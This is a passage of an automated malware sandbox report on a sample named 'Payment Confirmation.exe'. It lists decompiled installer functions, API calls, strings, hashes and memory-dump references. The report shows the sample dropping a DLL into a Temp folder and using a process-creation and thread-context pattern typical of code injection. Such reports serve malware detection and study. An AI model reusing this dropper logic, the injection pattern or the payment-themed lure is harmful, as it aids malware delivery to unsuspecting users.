						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                  0x00402c5d
                                                  0x00402c60
                                                  0x00402c63
                                                  0x00402c66
                                                  0x00402c6c
                                                  0x00402c7d
                                                  0x00402c82
                                                  0x00402c95
                                                  0x00402c9a
                                                  0x00402c9d
                                                  0x00402ca3
                                                  0x00000000
                                                  0x00402ca5
                                                  0x00402cb0
                                                  0x00402cb6
                                                  0x00402cc7
                                                  0x00402cce
                                                  0x00402cd4
                                                  0x00402cd6
                                                  0x00402cdb
                                                  0x00402cdd
                                                  0x00402dca
                                                  0x00402dcc
                                                  0x00402dd1
                                                  0x00402dd8
                                                  0x00000000
                                                  0x00000000
                                                  0x00402dda
                                                  0x00402ddd
                                                  0x00402e01
                                                  0x00402e06
                                                  0x00402e0c
                                                  0x00402e0e
                                                  0x00402e17
                                                  0x00402e1c
                                                  0x00402e1f
                                                  0x00402e20
                                                  0x00402e21
                                                  0x00402e23
                                                  0x00402e28
                                                  0x00402e2b
                                                  0x00402e3e
                                                  0x00402e42
                                                  0x00402e4a
                                                  0x00402e4f
                                                  0x00402e51
                                                  0x00402e51
                                                  0x00402e51
                                                  0x00402e59
                                                  0x00402e59
                                                  0x00402e5c
                                                  0x00402e5d
                                                  0x00402e5d
                                                  0x00402e60
                                                  0x00402e62
                                                  0x00402e62
                                                  0x00402e62
                                                  0x00402e6c
                                                  0x00402e72
                                                  0x00402e80
                                                  0x00402e85
                                                  0x00000000
                                                  0x00402e85
                                                  0x00000000
                                                  0x00402e2b
                                                  0x00402de5
                                                  0x00402df0
                                                  0x00402df5
                                                  0x00402df7
                                                  0x00000000
                                                  0x00000000
                                                  0x00402dfc
                                                  0x00402dff
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ce3
                                                  0x00402ce8
                                                  0x00402ce8
                                                  0x00402ced
                                                  0x00402cf1
                                                  0x00402cf8
                                                  0x00402cfd
                                                  0x00402cff
                                                  0x00402d01
                                                  0x00402d01
                                                  0x00402d05
                                                  0x00402d0a
                                                  0x00402d0c
                                                  0x00402e36
                                                  0x00402e2d
                                                  0x00000000
                                                  0x00402e2d
                                                  0x00402d12
                                                  0x00402d19
                                                  0x00402d95
                                                  0x00402d99
                                                  0x00402d9d
                                                  0x00402da2
                                                  0x00000000
                                                  0x00402d99
                                                  0x00402d22
                                                  0x00402d27
                                                  0x00402d2a
                                                  0x00402d2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d31
                                                  0x00402d38
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d3a
                                                  0x00402d41
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d43
                                                  0x00402d4a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d4c
                                                  0x00402d53
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d55
                                                  0x00402d5b
                                                  0x00402d64
                                                  0x00402d6a
                                                  0x00402d6d
                                                  0x00402d6f
                                                  0x00402d75
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d7b
                                                  0x00402d7f
                                                  0x00402d87
                                                  0x00402d87
                                                  0x00402d8a
                                                  0x00402d8d
                                                  0x00402d8f
                                                  0x00402d91
                                                  0x00402d91
                                                  0x00000000
                                                  0x00402d8f
                                                  0x00402d81
                                                  0x00402d85
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402da3
                                                  0x00402da3
                                                  0x00402da9
                                                  0x00402db5
                                                  0x00402db5
                                                  0x00402db8
                                                  0x00402dbe
                                                  0x00402dc0
                                                  0x00402dc0
                                                  0x00402dc8
                                                  0x00402dc8
                                                  0x00000000
                                                  0x00402dc8

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402C66
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment Confirmation.exe,00000400), ref: 00402C82
                                                    • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Payment Confirmation.exe,80000000,00000003), ref: 00405873
                                                    • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment Confirmation.exe,C:\Users\user\Desktop\Payment Confirmation.exe,80000000,00000003), ref: 00402CCE
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                  • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                  • Null, xrefs: 00402D4C
                                                  • "C:\Users\user\Desktop\Payment Confirmation.exe" , xrefs: 00402C55
                                                  • Inst, xrefs: 00402D3A
                                                  • C:\Users\user\Desktop\Payment Confirmation.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                  • pA, xrefs: 00402CE3
                                                  • soft, xrefs: 00402D43
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                  • Error launching installer, xrefs: 00402CA5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Payment Confirmation.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment Confirmation.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                  • API String ID: 4283519449-4094093595
                                                  • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                  • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                  • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                  • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\engineer\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\engineer\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                                                  0x00401751
                                                  0x00401758
                                                  0x00401761
                                                  0x00401764
                                                  0x00401767
                                                  0x0040176c
                                                  0x00401774
                                                  0x00401790
                                                  0x00401776
                                                  0x00401776
                                                  0x00401777
                                                  0x00401777
                                                  0x00401796
                                                  0x004017a0
                                                  0x004017a0
                                                  0x004017a4
                                                  0x004017a7
                                                  0x004017ac
                                                  0x004017ae
                                                  0x004017b0
                                                  0x004017b5
                                                  0x004017b5
                                                  0x004017c0
                                                  0x004017c0
                                                  0x004017d1
                                                  0x004017d3
                                                  0x004017d3
                                                  0x004017d4
                                                  0x004017d4
                                                  0x004017d7
                                                  0x004017da
                                                  0x004017dd
                                                  0x004017dd
                                                  0x004017e4
                                                  0x004017f3
                                                  0x004017f8
                                                  0x004017fb
                                                  0x004017fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00401800
                                                  0x00401803
                                                  0x0040185d
                                                  0x00401862
                                                  0x004015a8
                                                  0x0040268f
                                                  0x0040268f
                                                  0x004028be
                                                  0x004028c1
                                                  0x004028c1
                                                  0x00000000
                                                  0x00401805
                                                  0x0040180b
                                                  0x00401816
                                                  0x00401823
                                                  0x0040182e
                                                  0x00401844
                                                  0x00401844
                                                  0x00401847
                                                  0x00000000
                                                  0x0040184d
                                                  0x0040184d
                                                  0x0040184e
                                                  0x0040186b
                                                  0x004028c7
                                                  0x004028c7
                                                  0x004028c7
                                                  0x00401850
                                                  0x00401850
                                                  0x00401851
                                                  0x00401492
                                                  0x00402241
                                                  0x00402241
                                                  0x00402241
                                                  0x0040184e
                                                  0x00401847
                                                  0x004028c9
                                                  0x004028cd
                                                  0x004028cd
                                                  0x0040187b
                                                  0x00401880
                                                  0x00401886
                                                  0x00401887
                                                  0x00401888
                                                  0x0040188b
                                                  0x0040188e
                                                  0x00401893
                                                  0x00401899
                                                  0x0040189d
                                                  0x0040189f
                                                  0x004018a7
                                                  0x004018b3
                                                  0x004018a1
                                                  0x004018a1
                                                  0x004018a5
                                                  0x00000000
                                                  0x00000000
                                                  0x004018a5
                                                  0x004018bc
                                                  0x004018c2
                                                  0x004018c4
                                                  0x00000000
                                                  0x004018ca
                                                  0x004018ca
                                                  0x004018cd
                                                  0x004018e5
                                                  0x004018cf
                                                  0x004018d2
                                                  0x004018db
                                                  0x004018db
                                                  0x004018ea
                                                  0x004018ef
                                                  0x0040223c
                                                  0x00000000
                                                  0x0040223c
                                                  0x00000000

                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,naqeld,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                  • CompareFileTime.KERNEL32(-00000014,?,naqeld,naqeld,00000000,00000000,naqeld,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,agrlexd Setup,NSIS Error), ref: 00405BA5
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                    • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                    • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                    • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsp1E48.tmp$C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll$naqeld
                                                  • API String ID: 1941528284-1987454883
                                                  • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                  • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                  • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                  • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x31089
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                                                  0x00402e96
                                                  0x00402e9a
                                                  0x00402e9d
                                                  0x00402ea2
                                                  0x00402ea4
                                                  0x00402ea4
                                                  0x00402eab
                                                  0x00402eaf
                                                  0x00402eb3
                                                  0x00402eb5
                                                  0x00402eb5
                                                  0x00402eba
                                                  0x00402ebf
                                                  0x00402ec1
                                                  0x00402eca
                                                  0x00402eca
                                                  0x00402ed5
                                                  0x00402edc
                                                  0x0040302c
                                                  0x0040302c
                                                  0x00000000
                                                  0x00402ee2
                                                  0x00402ee6
                                                  0x00403017
                                                  0x0040306c
                                                  0x00403031
                                                  0x00403037
                                                  0x00403039
                                                  0x00403039
                                                  0x0040304a
                                                  0x00000000
                                                  0x0040304c
                                                  0x0040305f
                                                  0x00403011
                                                  0x00403011
                                                  0x0040302e
                                                  0x0040302e
                                                  0x00000000
                                                  0x00403066
                                                  0x00403066
                                                  0x00403069
                                                  0x00000000
                                                  0x00403069
                                                  0x0040305f
                                                  0x0040304a
                                                  0x00403077
                                                  0x00000000
                                                  0x00403077
                                                  0x0040301c
                                                  0x0040301e
                                                  0x0040301e
                                                  0x0040302a
                                                  0x00403074
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040302a
                                                  0x00402ef7
                                                  0x00402efa
                                                  0x00402eff
                                                  0x00402eff
                                                  0x00402f09
                                                  0x00402f0c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f12
                                                  0x00402f12
                                                  0x00402f12
                                                  0x00402f1a
                                                  0x00402f1c
                                                  0x00402f1c
                                                  0x00402f2d
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f33
                                                  0x00402f36
                                                  0x00402f3c
                                                  0x00402f42
                                                  0x00402f4a
                                                  0x00402f50
                                                  0x00402f55
                                                  0x00402f5c
                                                  0x00402f5f
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f65
                                                  0x00402f6b
                                                  0x00402f6d
                                                  0x00402f7a
                                                  0x00402f7c
                                                  0x00402faa
                                                  0x00402fb0
                                                  0x00402fb9
                                                  0x00402fbe
                                                  0x00402fbe
                                                  0x00402fc5
                                                  0x00403005
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402fc7
                                                  0x00402fca
                                                  0x00402fea
                                                  0x00402fed
                                                  0x00402ff0
                                                  0x00402ff6
                                                  0x00402ffa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403000
                                                  0x00402fd6
                                                  0x00402fde
                                                  0x00000000
                                                  0x00402fe5
                                                  0x00402fe5
                                                  0x00000000
                                                  0x00402fe5
                                                  0x00402fde
                                                  0x00402fc5
                                                  0x0040300d
                                                  0x00000000
                                                  0x0040300d
                                                  0x00000000
                                                  0x00402f12

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402EEC
                                                  • GetTickCount.KERNEL32 ref: 00402F6D
                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                                  • wsprintfA.USER32 ref: 00402FAA
                                                  • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CountTick$FileWritewsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 4209647438-2449383134
                                                  • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                  • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                  • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                  • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                  0x00405351
                                                  0x00405355
                                                  0x00405358
                                                  0x0040535e
                                                  0x00405362
                                                  0x00405366
                                                  0x0040536e
                                                  0x00405375
                                                  0x0040537b
                                                  0x00405382
                                                  0x00405389
                                                  0x00405391
                                                  0x00405393
                                                  0x00000000
                                                  0x00405393
                                                  0x0040539d
                                                  0x004053a4
                                                  0x004053ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004053bc
                                                  0x004053c0

                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                  • GetLastError.KERNEL32 ref: 0040539D
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                  • GetLastError.KERNEL32 ref: 004053BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                  • API String ID: 3449924974-1629030221
                                                  • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                  • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                  • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                  • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001B158, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 1001B29C
                                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 1001B2BF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ContextCreateProcessThread
                                                  • String ID: D
                                                  • API String ID: 2843130473-2746444292
